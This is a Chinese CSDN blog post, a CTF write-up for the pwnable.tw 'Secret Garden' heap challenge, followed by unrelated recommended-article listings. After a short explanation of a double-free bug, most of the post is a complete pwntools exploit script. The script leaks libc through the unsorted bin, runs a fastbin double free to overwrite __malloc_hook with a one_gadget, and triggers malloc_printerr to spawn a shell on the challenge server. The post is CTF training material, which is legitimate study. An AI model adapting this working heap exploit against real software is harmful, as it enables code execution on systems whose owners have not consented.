【tw】secret garden

最新推荐文章于 2022-08-12 21:13:12 发布
最新推荐文章于 2022-08-12 21:13:12 发布
阅读量145 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/113921768
版权
程序和思路

delete 功能只 free 了 name 的堆块,并且 free 的 if 并没有检查 *v1,所以可以 double free:
在这里插入图片描述
add 的时候 name 的大小也无限制。所以可以直接 free 进 unsorted bin 然后 申请出来泄漏 libc,接着 double free 打 malloc_hook ,但是 one_gadget 条件不满足所以通过触发 malloc_printerr 来触发

完整exp
#encoding=utf-8
from pwn import *

# p = process("./secretgarden")
p = remote("chall.pwnable.tw", 10203)
elf = ELF("./secretgarden")
libc = ELF("./libc_64.so.6")
# libc = elf.libc

context(log_level = 'debug')
DEBUG = 0
if DEBUG:
	gdb.attach(p, 
	'''	
	b *0x08048935
	c
	''')

def dbg():
    gdb.attach(p)
    pause()

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\x00'))	
uu64    = lambda data               :u64(data.ljust(8, '\x00'))
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = "Your choice : "
def cmd(idx):
	ru(menu)
	sl(str(idx))

def add(length, name, color='blue'):
	cmd(1)
	ru("Length of the name :")
	sl(str(length))
	ru("The name of flower :")
	se(name)
	ru("The color of the flower :")
	sl(color)

def show():
	cmd(2)

def remove(idx):
	cmd(3)
	ru("remove from the garden:")
	sl(str(idx))

def clear():
	cmd(4)

add(0x400, "a") #0
add(0x28, "a") #1
add(0x30, "a") #2
# 先 remove 一个 name = 0x28 的chunk,这也下一个 chunk 的管理堆块就不会从 0x410 中分割
remove(0)
remove(1)
add(0x400, "abcdefgh") #3
show()
ru("flower[3] :abcdefgh")
libc_base = u64(ru("\x7f")[-6:].ljust(8, '\x00')) - 0x68 - libc.symbols['__malloc_hook']
info("libc_base", libc_base)
malloc_hook = libc_base + libc.symbols['__malloc_hook']
free_hook = libc_base + libc.symbols['__free_hook']
# og = 0xf0364 + libc_base
og = 0xef6c4 + libc_base

add(0x68, "a") #4
add(0x68, "a") #5
add(0x68, "a") #6

remove(4)
remove(5)
remove(4)

add(0x68, p64(malloc_hook - 0x23))
add(0x68, "a")
add(0x68, "a")
add(0x68, '\x00'*0x13 + p64(og))

remove(7)
remove(7)

ia()

在这里插入图片描述

、皮皮鸭
关注
专栏目录
中央电视台最常用的 100 首经典背景乐曲(视频制作音乐推荐) 2009-05-12 17:31:47
脑袋不好使
11-23 4万+
有一种旋好象一见钟情的意中人,让你知道什么叫“曾经沧海难为水,除却巫山不是云”;有一种旋律好似相思成灾的恋人,让你体会什么叫“衣带渐宽终不悔,为伊消得人憔悴”;有一种旋律恰似相恨见晚的知音,让你感慨什么叫“此曲只应天上有,人间难得几回闻”。没错,这就是背景音乐,真正的好音乐,传说中的“销魂曲”。1.豪勇七蛟龙(The Magnificent Seven)大型颁奖晚会最喜欢用的背景音乐,地球人都知道
TW8836原厂代码.rar_8836_TW8836 开发资料_tw8836*_tw8836中文资料_tw8836资料
07-15
"TW8836原厂代码.rar_8836_TW8836 开发资料_tw8836*_tw8836中文资料_tw8836资料"这个压缩包文件,为我们提供了深入理解并进行TW8836开发的重要资源。 一、8836原厂代码 该压缩包中的"TW8836-130306"很可能包含了TW...
pwnbale.tw Secret Garden
doudoudedi
12-30 277
思路 我是做了3次double free其实不需要这么多次em,其实可以构造堆块重叠的但是我看可以直接并且远程也很稳定就用double free了,先打malloc_hook打不同(好像可以使用realloc_hook调栈)我的思路是将stderr的flag值写成/bin/sh,虚表写成堆地址然后布置好system在exit函数调用fllush函数的时候触发overflow调用就会调用system("/bin/sh"),shell很稳定不错嘻嘻 from pwn import * #p=process(".
HITCON-Training-Writeup
baikeng3674的博客
03-14 570
HITCON-Training-Writeup 原文链接M4x@10.0.0.55 项目地址M4x's github,欢迎star~ 更新时间5月16 复习一下二进制基础,写写HITCON-Training的writeup,题目地址:https://github.com/scwuaptx/HITCON-Training Outline Basic Knowledge In...
hitcon training lab12(secretgarden
m0_62326489的博客
08-12 181
史上最经典的27首背景音乐
4克拉
01-14 3500
转自:http://emuch.net/html/200611/357420.html【推荐】【资源荟萃】史上最经典的27首背景音乐1.CCTV《天气预报》主题曲http://www.qianxi.cn/bbs/uploadfile/2006-10/20061015135740345.wma据说是迄今为止中央电视台唯一没有改变过的背景音乐,《天气预报》一直使用它。 《渔舟唱晚》(即天气预报背景
经典的背景音乐
01-12 1294
钢琴: 《Kiss The Rain 雨的印记》(Yiruma) 《Tears眼泪》(The Daydream) 《YOU&ME》(The Daydream) 《天空之城》钢琴版 Carrying You 《Merry Christmas》 Mr.Lawrence(坂本龙一)(最近发现湖南台周笔畅的勇往直前的广告背景配乐就是这首) 《流动的城市》林海 《月光边境》林海 《迷失》林海 《远方...
火星贴---51首电视台使用频率最高经典背景音乐
lanndmentt的专栏
11-14 2687
1.豪勇七蛟龙(The Magnificent Seven)   大型颁奖晚会最喜欢用的背景音乐,地球人都知道。伯恩斯坦作曲。   地址http://www.aebc.com/~shtuet/m7.mp3   2.故乡的原风景   《神雕侠侣》多次引用,哀伤感人。出自扶桑作曲家宗次郎1991年的专辑《木道》。   地址http://www.kf-cn.com/cn/miimg/sound.mp3 
tw8816.rar_TW8816_mst7_tw8816 vga_tw8816是什么_车载
07-15
标题中的“TW8816.rar”是一个压缩文件,它包含有关TW8816屏驱动集成电路(IC)的源代码。TW8816是一款专门用于显示驱动的芯片,尤其在车载电子产品中广泛应用。这款IC是MST7系列的一员,意味着它可能具有高性能和低...
TW8811-TW8816.rar_ tw8816_TW8811_TW8816_tw8811pdf_tw8816 osd
07-14
TW8811 8816 屏幕驱动芯片。实现OSD 视频缩放。不同分辨率显示的。
51首电视台使用频率最高经典背景音乐
lemon_fantasy的专栏
08-05 3913
1.豪勇七蛟龙(The Magnificent Seven)    大型颁奖晚会最喜欢用的背景音乐,地球人都知道。伯恩斯坦作曲。   地址http://www.aebc.com/~shtuet/m7.mp3   2.故乡的原风景    《神雕侠侣》多次引用,哀伤感人。出自扶桑作曲家宗次郎1991年的专辑《木道》。   地址http://www.kf-cn.com/cn/miimg/sound.mp
【pwn】orw
weixin_43960998的博客
06-19 1791
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
【攻防世界】greeting-150
weixin_43960998的博客
03-28 1351
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
【攻防世界】Recho
weixin_43960998的博客
03-28 728
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值